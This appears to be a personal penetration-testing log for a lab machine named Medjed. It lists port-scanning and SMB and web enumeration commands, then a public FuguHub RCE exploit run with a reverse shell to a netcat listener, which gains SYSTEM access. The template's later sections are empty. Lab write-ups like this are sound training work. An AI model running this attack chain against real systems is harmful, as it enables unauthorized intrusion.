Medjed
๐งช Pentest Log: {{date:2025-08-04}}
๐ Target Information
- Machine Name: Medjed
- IP Address: 192.168.123.127
- Operating System: Windows
ip=192.168.123.127
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 135
rpcclient -U '' -N $ip
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 3306
Port 8000
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
found
BarracudaDrive 6.5
Port 30021
Anonymous Login
ftp anonymous@$ip -p 30021
Port 33033
Port 44330
Port 45332
Port 45443
๐ฃ Exploitation / Foothold
๐ Vulnerability Summary
- Service / Port: 8000
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
FuguHub 8.4 Authenticated RCE
https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
python3 exploit.py -r $ip -rp 8000 -l 192.168.45.163 -p 8000
nc -lvnp 8000
๐งฌ Privilege Escalation
๐ค Current Access
- User: nt authority\system
- Groups: N/A
- Shell Type: webshell
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A